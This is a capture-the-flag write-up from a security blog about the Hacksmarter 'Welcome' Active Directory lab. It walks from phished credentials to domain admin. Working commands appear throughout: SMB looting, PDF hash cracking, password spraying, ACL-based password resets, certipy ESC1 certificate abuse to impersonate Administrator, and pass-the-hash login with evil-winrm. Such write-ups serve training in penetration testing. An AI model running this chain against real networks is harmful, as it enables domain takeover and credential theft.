Skip to main content
Cybersecurity & DevOps projects | CTF Writeups
  1. Writeups/

Hacksmarter: Welcome (Easy)

·5 mins·
Arbaaz Jamadar
Author
Arbaaz Jamadar
Table of Contents

Objective:
#

You are a member of the Hack Smarter Red Team. During a phishing engagement, you were able to retrieve credentials for the client’s Active Directory environment. Use these credentials to enumerate the environment, elevate your privileges, and demonstrate impact for the client.

Credentials obtained from Phishing:
# 

e.hills:Il0vemyj0b2025!

Summary:
#

We began with credentials harvested via phishing and used them to fully compromise Active Directory. Starting from the user e.hills, we mapped SMB shares and domain objects and collected account relationships with BloodHound. An exposed HR file revealed an onboarding password reused by a.harris; because of a.harris’s group memberships hr@welcome.local (which grant GenericAll over i.park), we chained permissions and reset multiple account credentials until we reached svc_ca, a service account able to enroll certificates. While enumerating AD CS we discovered a misconfigured template vulnerable to ESC1 exploitation, requested a certificate that let us impersonate the Administrator, and used the resulting credentials to authenticate. Remotely logging in as the Administrator on the domain controller completing full domain escalation from that single phished login.

#

Domain Controller:
#

  1. With the results of our Nmap Scan we identify the domain name is WELCOME.local exposed DNS on 53, Kerberos on 88, Active Directory LDAP on 389 (AD), LDAPS on 636, SMB on 139 and 445 (SMB2 message signing required), RDP on 3389 and the windows host name is DC01:
    nmap.png
    nmapserv.png

SMB Shares:
#

  1. We can verify the harvested user’s credentials by using them to authenticate against smb using NetExec. 
    nxc smb 10.1.126.204 -u e.hills -p 'Il0vemyj0b2025!'
  2. The compromised user’s credentials are valid we can use them to enumerate the SMB shares. 
    	nxc smb 10.1.126.204 -u e.hills -p 'Il0vemyj0b2025!' --shares
    smb-enum.png
  3. We have READ access over an interesting share, Human Resources .
  4. Using smbclient, we can retrieve all the files present in the Human Resources share. 
    smbclient \\\\10.1.126.204\\"Human Resources" -U e.hills
    sharemap.png

JohnTheRipper:
#

  1. All the pdf have generic onboarding information and the Welcome Start Guide.pdf file is password protected. We can try to bruteforce the password by creating and cracking the hash with johntheripper. 
    #create hash
pdf2john Welcome\ Start\ Guide.pdf > pdf.hash
#crack the hash
john pdf.hash --wordlist=/usr/share/wordlists/rockyou.txt
    hash.png
    hashcrack.png
  2. The password for unlocking the pdf is humanresources, in the pdf content’s we see the initial password set for new employee account.
  3. The Password for new employee accounts is Welcome2025!@

Enumerating Users:
#

  1. We can get all the domain objects, relations, policies, and users with the help of bloodhound-python or ldapdomaindump. I prefer ldapdomaindump to collect usernames and initial information and if I need to analyze relations after that I like to use bloodhound. 
    	ldapdomaindump -u welcome.local\\e.hills -p 'Il0vemyj0b2025!' -n 10.1.126.204 -m welcome.local
    ldapdump.png
    ldapdumpanalysis.png
  2. We create a list of users from the domain dump and then we use it with the list of passwords that we have collected till now and try to find valid users and credentials.
  3. Use NetExec to gather valid credentials: 
    nxc smb 10.1.78.166 -u users -p password
    verify.png
  4. We found valid credentials a.harris:Welcome2025!@

BloodHound:
#

  1. I enumerated SMB and did not find anything new, so now it is time to check relations and see if we can pivot and escalate our privileges.
  2. Dump relations and objects using bloodhound-python: 
    bloodhound-python -d welcome.local -u a.harris -p 'Welcome2025!@' -c all -ns 10.1.78.166
    bloodhounddump.png
  3. Import the dumps into bloodhound and check what all relations are attached to a.harris , we can see that a.harris’s group has GenericAll rights over i.park.
    relations.png
  4. We can use net rpc to reset the password for i.park, net rpc won’t display anything on positive result. It will only display output if any error occurs 
    net rpc password 'i.park' 'Welcome2025!@' -U 'welcome.local'/'a.harris'%'Welcome2025!@' -S 10.1.78.166
    resetvuln.png
  5. We can verify password change for i.park using nxc: 
    nxc smb 10.1.78.166 -u 'i.park' -p 'Welcome2025!@'

Administrator:
#

  1. While checking transitive objects for a.harris, we noticed that i.park is member of helpdesk group which has ForceChangePassword rights over svc_ca and svc_web and a.harris is also a member of certificate service dcom access. Indicating that there must Certificate Service enabled on the domain.

    forcereset.png

  2. We can confirm the ADCS using nxc

    nxc ldap 10.1.78.166 -u 'i.park' -p 'Welcome2025!@' -M adcs

    adcs.png

  3. We can use certipy to enumerate any certificate templates that can be abused to escalate privileges

    certipy find -u a.harris -p 'Welcome2025!@' -dc-ip 10.1.78.166 -vulnerable
  certipy find -u i.park -p 'Welcome2025!@' -dc-ip 10.1.78.166 -vulnerable

    certipy.png

  4. Both i.park and a.harris cannot be used to escalate privileges, the user svc_ca is quite intriguing. Maybe it is a service account for Certificate Authority.

  5. We can change the password for svc_ca account forcefully using net rpc and try to find a certificate template vulnerability.

    1. I came to this conclusion after whole lot of enumeration on a.harris and i.park none of them had anything interesting on their desktop’s.

  6. Command to change the password for svc_ca:

    	net rpc password 'svc_ca' 'Welcome2025!@' -U 'welcome.local'/'i.park'%'Welcome2025!@' -S 10.1.78.166

    certipy.png

  7. when we use certipy to find a vulnerable template we can see that we can abuse template name Welcome-Template, go to certipy wiki and check out privilege escalation using ESC1 method. It will give you step by step guide on how you can abuse this vulnerability.

  8. Following ESC1 abuse:

    certipy req \
-u 'svc_ca@welcome.local' -p 'Welcome2025!@' \
-dc-ip '10.1.78.166' -target 'DC01.WELCOME.LOCAL' \
-ca 'WELCOME-CA' -template 'Welcome-Template' \
-upn 'administrator@welcome.local' -sid 'S-1-5-21-141921413-1529318470-1830575104-500'
    1. You can find the sid using bloodhound, search for administrator and you can see the sid in node info:
      sid.png
    2. Get the certificate, using the above mentioned command
      admin-hash.png

  9. Use the certificate to get the NTLMv1 hash, that you can use as Pass The Hash, or you can crack it offline using john.

    certipy auth -pfx 'administrator.pfx' -dc-ip '10.1.78.166'

    get-hash.png

Flags:
#

  1. Use evil-winrm to login remotely and retrieve the flags:
    1. user.txt 
      evil-winrm -u a.harris -p 'Welcome2025!@' -i 10.1.78.166
      user.txt.png
    2. root.txt 
        evil-winrm -u administrator -H '0cf1b799460a39c852068b7c0574677a' -i 10.1.78.166
      root.txt.png

Note:
#

  1. Use RustScan to reliably enumerate ports in an AD environemt, Nmap results tend to be false negative sometimes.
  2. During the enumerations using RustScan, I was able to find that port 5985 is open allowing you to remotely log into the domain controller.

Related

Breaking The Barriers: OAuth Abuse, Dynamic Groups & Guest Privilege Escalation
·6 mins
Needle In A Haystack: Deep dive into subdomain enumeration using OSINT Tools
·4 mins
Contain Me If You Can: Container Escape WIZ CTF
·5 mins